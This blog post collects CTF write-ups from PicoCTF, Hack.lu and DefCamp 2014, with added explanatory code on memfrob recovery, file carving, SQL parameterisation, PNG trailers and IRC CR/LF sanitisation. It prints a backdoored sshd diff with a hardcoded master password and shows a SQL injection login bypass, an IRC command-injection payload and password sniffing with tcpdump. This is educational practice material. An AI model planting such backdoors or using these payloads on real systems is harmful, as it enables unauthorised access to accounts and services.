PicoCTF 2014

Pico CTF 2014 finished up last week. It was a nice CTF running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100-plus point challenges are on par with many other CTF challenges. Below I am going to include some quick write-ups. There were a huge number of challenges, and my team was in and out of the CTF as time permitted; since we could not be ranked, it was not a high priority. The write-ups below are just the ones I personally did; my team completed many more.

SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in our network logs is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host 'backdoor.picoctf.com (23.21.109.77)' can't be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'backdoor.picoctf.com,23.21.109.77' (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com's password:
Download the original tar.gz and diff it against the hacked source:
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
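Review bot: the frobcmp()/check_password() pair at lines 777-794 of hack/auth.c is a hardcoded master credential, not a hash check: memfrob() XORs with a fixed 42, so the constant "CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY" is trivially reversible, and the strcmp() on the result means any client presenting that string is accepted. It has no place in auth.c; any host running a build that contains it should be treated as compromised and rebuilt from a trusted source tree.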
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }
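Review bot: the inserted `if (check_password(password)) { return ok; }` at line 115 of hack/auth-passwd.c short-circuits the real password verification, returning ok before the remaining checks in that function run, so the static string is accepted for whichever account is being authenticated. Remove the branch together with the prototype added to auth.h; this is the only call into check_password() in the diff.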

After much googling and talking with teammates, I found an explanation of the memfrob() call that frobcmp relies on (from the memfrob man page):

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

check_password() memfrobs the password you type and compares the result with the hardcoded string, so that string is the memfrob'd password. Because XOR with a fixed byte is its own inverse, applying the same transform to the string recovers it: convert each character to its decimal code, XOR it with 42, and convert back to ASCII.

Original:
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
Decimal version:
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
XOR with 42:
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
Converted to ASCII:
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
Final ssh password:
iminyourmachinestealingyourflags
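The same recovery in Python, as an added example that is not part of the writeup: memfrob is its own inverse, so XOR-42 over the hardcoded constant yields the password, and a small scanner shows how a defender can hunt a binary for other strings hidden the same way. The sample blob is constructed here; only the 32-byte constant comes from the diff above.

```python
# Added example: reproduces the memfrob() XOR-42 recovery from the writeup and
# shows a simple scan for other memfrob-hidden strings in a binary blob.
import string

FROB_KEY = 42  # glibc memfrob() XORs every byte with 42

# The hardcoded comparison string from the backdoored auth.c
BACKDOOR_CONSTANT = b"CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY"


def memfrob(data: bytes) -> bytes:
    """XOR every byte with 42, like glibc's memfrob(). Applying it twice is the identity."""
    return bytes(b ^ FROB_KEY for b in data)


def recover_password(frobbed: bytes) -> str:
    """check_password() memfrobs the typed password and compares it with the
    constant, so memfrobbing the constant gives back the cleartext password."""
    return memfrob(frobbed).decode("ascii")


def find_frobbed_strings(blob: bytes, min_len: int = 8) -> list:
    """Return (offset, cleartext) for runs of bytes that become lowercase
    text, digits or '_' after memfrob(). Useful for hunting hidden credentials
    in a suspect binary; shorter runs are ignored to cut down on noise."""
    allowed = set((string.ascii_lowercase + string.digits + "_").encode())
    hits, start = [], None
    for i, b in enumerate(blob):
        if (b ^ FROB_KEY) in allowed:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                hits.append((start, memfrob(blob[start:i]).decode("ascii")))
            start = None
    if start is not None and len(blob) - start >= min_len:
        hits.append((start, memfrob(blob[start:]).decode("ascii")))
    return hits


# Constructed sample "binary": a few header-like bytes, the backdoor constant,
# then some padding. Not taken from the real sshd binary.
SAMPLE_BLOB = b"\x00\x7fELF\x01\x01\x01" + BACKDOOR_CONSTANT + b"\x00\x00sshd\x00"

if __name__ == "__main__":
    print(recover_password(BACKDOOR_CONSTANT))
    for off, text in find_frobbed_strings(SAMPLE_BLOB):
        print(f"offset {off}: {text}")
```

Running the scanner over a real binary produces false positives on any run of bytes that happens to land in the allowed set, which is why the minimum length is there; the backdoor constant above is long enough to stand out.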

Log in as jon via ssh and get the flag:
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com's password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$


Redacted – 50

You found a letter that may shed light on recent events.

Let's look at the metadata first.

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r--r--
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an Adobe Illustrator document, and the manifest references an embedded PNG (/Users/ryan/Desktop/Redacted1.png).

Let's see if we can pull the embedded images out of the PDF:

pdfimages -j Redacted.pdf out

<clean image>

There it is. The secret: one_two_three_four


Intercepted Post – 40

We intercepted some of your Dad’s web activity. Can you get a password from his traffic? You can also view the traffic on CloudShark.

<packet image>

Found in the POST body:
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
That doesn't work as submitted because it is URL-encoded (%7B is {, %24 is $, %7D is }). Decoding it gives:
flag{pl$_$$l_y0ur_l0g1n_form$}

complete

Delicious! – 60

You have found the administrative control panel for the Daedalus Corporation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

The page displays:

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
Used Burp Suite to edit the session cookie and resend the request with Repeater. Tried many values; 65 was the key.

<burp image>

Flag is session_cookies_are_the_most_delicious


Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

Disassemble the file with objdump and grep for the function name:

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
The flag is the function's start address: 08048444

snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
Recover the data with foremost:

foremost -i disk.img -o file.img
Processing: disk.img
|*|
root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
------------------------------------------------------------------

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

The carved image with the flag was 00000237.jpg.
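A minimal JPEG carver in the spirit of foremost's audit output above, added here as an example and not part of the writeup or of foremost itself. It scans a byte string for the JPEG start-of-image marker (FF D8 FF) and the matching end-of-image marker (FF D9) and names each hit after its 512-byte sector, which is how the 00000057.jpg at offset 29184 in the audit log gets its name. The disk image is constructed in memory; it is not the challenge file.

```python
# Added example: a toy JPEG carver that reports files the way foremost names
# them (sector offset, bs=512). The "disk image" is constructed here.

SOI = b"\xff\xd8\xff"   # JPEG start-of-image (FF D8) plus the first marker byte
EOI = b"\xff\xd9"       # JPEG end-of-image
SECTOR = 512            # foremost names carved files after the sector offset


def carve_jpegs(image: bytes) -> list:
    """Return (name, offset, size) for each FFD8FF...FFD9 run in the image.

    A production carver also bounds the size and copes with nested EOI markers
    from embedded thumbnails; this version takes the first EOI after each SOI."""
    found, pos = [], 0
    while True:
        start = image.find(SOI, pos)
        if start == -1:
            break
        end = image.find(EOI, start + len(SOI))
        if end == -1:
            break  # truncated file, nothing more to carve
        size = end + len(EOI) - start
        found.append((f"{start // SECTOR:08d}.jpg", start, size))
        pos = end + len(EOI)
    return found


def build_sample_image() -> bytes:
    """Constructed image: two tiny fake JPEGs at sector 57 and sector 237,
    the same sectors as the first two entries in the audit log."""
    img = bytearray(300 * SECTOR)
    jpeg_a = SOI + b"\xe0" + b"A" * 100 + EOI   # FF D8 FF E0 = JFIF APP0 marker
    jpeg_b = SOI + b"\xe0" + b"B" * 40 + EOI
    img[57 * SECTOR:57 * SECTOR + len(jpeg_a)] = jpeg_a
    img[237 * SECTOR:237 * SECTOR + len(jpeg_b)] = jpeg_b
    return bytes(img)


def write_carved(image: bytes, out_dir: str) -> list:
    """Write each carved file into out_dir; returns the paths written."""
    import os
    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for name, off, size in carve_jpegs(image):
        path = os.path.join(out_dir, name)
        with open(path, "wb") as fh:
            fh.write(image[off:off + size])
        paths.append(path)
    return paths


if __name__ == "__main__":
    for name, off, size in carve_jpegs(build_sample_image()):
        print(f"{name} {size} bytes at offset {off}")
```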

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

Terminate the SQL statement with '# to bypass the password check (# starts a comment in MySQL, so the backend must be MySQL).

Use as the login:
admin' #

The returned page shows the flag:

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b
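The bug behind this challenge and its fix, as an added example (not the challenge's code, which is not on the page): the vulnerable login builds the query by string concatenation, so the quote and comment in the username cut the password clause off; the hardened version passes the values as bound parameters. The demo database is SQLite, whose comment syntax is -- rather than MySQL's #, so the runnable payload here is admin' -- while build_query shows what the page's admin' # payload does to the MySQL string.

```python
# Added example: SQL injection through string concatenation versus a
# parameterised query. Uses an in-memory SQLite database constructed here.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext for the demo only; a real service stores a password hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn


def build_query(username: str, password: str) -> str:
    """The vulnerable pattern: user input spliced straight into SQL text."""
    return (f"SELECT 1 FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Whatever follows the comment marker (# in MySQL, -- in SQLite) is ignored,
    # so "admin' --" makes the password clause disappear.
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: bound parameters are never parsed as SQL, so the quote and
    comment characters are just part of the username value."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(build_query("admin' #", "anything"))           # the MySQL-shaped payload
    print(login_vulnerable(db, "admin' --", "anything"))  # True: clause commented out
    print(login_safe(db, "admin' --", "anything"))        # False: no such user
```

Parameter binding fixes this class of bug regardless of which comment or quote characters the backend accepts, which is why it is preferable to input filtering.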


PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

Running strings on the image turns up nothing important. Looking at the image in a hex editor shows a proper PNG header and IEND trailer, but more data follows it, and the name flag.txt appears in that trailing data.

<hex editor image>

The trailing data also starts with 7z, so it looks like a compressed archive appended to the end of the file. Cut the trailing bytes off into another file with tail and extract them:
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0
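Doing the hex-editor step programmatically, as an added example that is not part of the writeup: walk the PNG chunk list to the IEND chunk, verifying each chunk's CRC on the way, and report whatever follows, identifying a 7-Zip archive by its six-byte signature. The PNG and the fake archive bytes are constructed here, not taken from the challenge file; the length the function reports is what you would pass to tail -c.

```python
# Added example: locate the end of a PNG and classify any appended data.
# The sample PNG and trailing bytes are constructed in build_sample().
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"   # 7-Zip archive signature


def png_end_offset(data: bytes) -> int:
    """Return the offset just past the IEND chunk, validating each chunk CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        (crc,) = struct.unpack(">I", crc_bytes)
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in chunk {ctype!r} at offset {pos}")
        pos += 12 + length
        if ctype == b"IEND":
            return pos
    raise ValueError("IEND chunk not found")


def trailing_data(data: bytes) -> tuple:
    """Return (trailing_bytes, description) for anything appended after IEND."""
    extra = data[png_end_offset(data):]
    if not extra:
        return extra, "no trailing data"
    if extra.startswith(SEVENZIP_MAGIC):
        return extra, "7-Zip archive"
    return extra, "unknown trailing data"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample() -> bytes:
    """Constructed 1x1 RGB PNG followed by a fake 7z header (signature only)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, depth, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")               # filter byte + one red pixel
    png = (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
           + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))
    fake_archive = SEVENZIP_MAGIC + b"\x00\x03" + b"flag.txt" + b"\x00" * 8  # 24 bytes
    return png + fake_archive


if __name__ == "__main__":
    sample = build_sample()
    extra, kind = trailing_data(sample)
    print(f"{kind}: {len(extra)} bytes after IEND -> tail -c {len(extra)} image.png")
```

Checking the CRCs matters: a file whose chunks fail their CRC but still opens in a viewer is itself a sign that something was spliced in, and a walker that trusts the length fields alone can be steered past the real IEND by a crafted chunk.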


Hack.lu 2014

This week my CTF team OverFlowSecurity was able to compete in hack.lu. This CTF seemed to be very well run and very challenging. Since this event was not over a weekend, most of our team could not commit a lot of time to it. We finished at a very respectable 80th place. I myself only concentrated on a single challenge based on an IRC bot. I actually learned a lot about how the IRC protocol works, and in the end one of my teammates solved the challenge with our combined efforts. Below is a quick write-up of the challenge. Next up for me is the PicoCTF in a week or so. It’s a long-running (2 week) challenge.


Barmixing-Bot
by freddy (Misc)
200 (+80) Points


There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

The bot was on an IRC channel. Using !help in the channel or in a private message to the bot gives you the list of accepted commands:

<barmixing-bot> Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

Played around with the commands for a while; nothing of great interest. Using !base64 with a lot of characters showed it split the output into 2 lines. Spent some time on this.

Noticed that the bot is in a channel called #hacklu-secret-channel. This channel is invite only. So at this point I figured the goal was to get into this channel.


Also noticed this with the !rot13 function. Created a rot13-encoded string to send /invite H1tch #hacklu-secret-channel, but this was just sent to the channel as text; the command was not actually issued. Resorted to reading the RFC for IRC.

After reading the docs and discussing it, my teammate suggested maybe we needed to send raw IRC commands through the bot. We had already been experimenting with the !base64d function that decodes base64, so we gave that a shot.

Encoded:

aaa\r\nINVITE h1tch #hacklu-secret-channel

and sent it to the bot via:

!base64d YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs

An invite was received by the bot and we were able to obtain the flag from the channel subject.

Flag: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH
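What went wrong in the bot, and the fix, as an added example modelled on the behaviour described above (the bot's own source is not on the page): IRC separates commands with CR LF, so if a bot splices decoded user data straight into the line it writes to the server, a CR LF inside that data ends the PRIVMSG and starts a second command. The hardened builder replaces CR, LF and NUL before sending. One caveat from the writeup's own payload: the base64 string above decodes to the two-character sequences backslash-r backslash-n rather than real control bytes, so how the bot turned them into a line break is not shown; the constructed payload below carries a real CR LF, which is an assumption.

```python
# Added example: CR/LF injection into an IRC command stream via the !base64d
# echo, and output sanitisation that prevents it. Payloads are constructed.
import base64

# The writeup's exact payload; decodes to literal backslash sequences, not CR LF.
WRITEUP_PAYLOAD = "YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs"


def build_privmsg_unsafe(target: str, text: str) -> bytes:
    """Vulnerable: decoded text is spliced straight into the line sent to the server."""
    return f"PRIVMSG {target} :{text}\r\n".encode()


def build_privmsg_safe(target: str, text: str) -> bytes:
    """Hardened: neutralise the bytes that terminate or split an IRC message."""
    cleaned = "".join(" " if ch in "\r\n\x00" else ch for ch in text)
    return f"PRIVMSG {target} :{cleaned}\r\n".encode()


def parse_commands(wire: bytes) -> list:
    """What the server sees: one command per CRLF-terminated line (RFC 1459/2812)."""
    return [line.decode() for line in wire.split(b"\r\n") if line]


def handle_base64d(target: str, arg: str, safe: bool) -> bytes:
    """Model of the bot's !base64d handler: decode the argument and echo it back."""
    decoded = base64.b64decode(arg).decode("utf-8", errors="replace")
    builder = build_privmsg_safe if safe else build_privmsg_unsafe
    return builder(target, decoded)


def decode_writeup_payload() -> bytes:
    return base64.b64decode(WRITEUP_PAYLOAD)


# Constructed payload with a real CR LF inside (assumption: the bot ended up
# emitting a real line break for the writeup's escaped sequence).
PAYLOAD = base64.b64encode(b"aaa\r\nINVITE h1tch #hacklu-secret-channel").decode()

if __name__ == "__main__":
    print(parse_commands(handle_base64d("#hacklu-saloon", PAYLOAD, safe=False)))
    print(parse_commands(handle_base64d("#hacklu-saloon", PAYLOAD, safe=True)))
```

The same rule applies to any protocol that is line- or delimiter-framed (SMTP, HTTP headers, syslog): data that came from a user must never be able to supply the framing bytes.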

DefCamp 2014 – Quest 100

Challenge text: My password is password but it is 2_*_10_*_16_*_8_*_4 characters long. What's my password? Ha ha ha!

This one I didn’t catch onto until almost the end when I had a doh moment.

The flag is the MD5 hash of the word password:

flag: 5f4dcc3b5aa765d61d8327deb882cf99

DefCamp 2014 – Network 100

You were given an IP address and a hint along the lines of: guests are always allowed, but the manager has a secret; what is it?

SSH access was open for user guest password guest.

Once in, you see a toolkit directory with tcpdump in it.

tcpdump -l -A | egrep -i 'secret'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
user=manager&pass=asecret
user=manager&pass=topsecretmanagerpassword
The secret is behind <strong>0f388689dc4728cfde0de9a1ee47c8d3</strong>. Don’t tell anyone!

Looking up the MD5 hash 0f388689dc4728cfde0de9a1ee47c8d3 in a reverse-hash database gives you the flag.

FLAG:  ididyourmom

DefCamp 2014

overflow-bunny

Overflowsec
()_() (='.'=) (>_<) () ()


Had a great time this weekend during DefCamp 2014. This was my third CTF and the first I was able to dedicate the required amount of time to. I participated with a great group of guys under the OverFlowsec team flag, or bunny rabbit in this case. Teams were limited to 5 and I was happy to fill one of those slots. Overall we finished 36th out of 600 teams, so I feel pretty good about that.


The CTF seemed to be well run, without a lot of issues overall. There were a few glitches here and there, like other teams deleting parts of a challenge to prevent others from obtaining the flag, and a machine or two that had some stability issues. This was a jeopardy-style CTF that required a VPN to access the target machines. There were 20 challenges, with 2 additional bonus challenges later in the event. We were able to take down all but 8. The categories were Quest, Web, Network, Exploit, Misc, and Bonus, although these categories seem to be more of a guideline; for example, one of the network challenges I would consider more web, and there were lots of other overlaps.


Overall a great CTF and a great learning experience for me. I would like to thank the organizers and the guys over at OverFlowSec for putting up with me. I will post a couple of write-ups for the challenges that I actually took some notes on.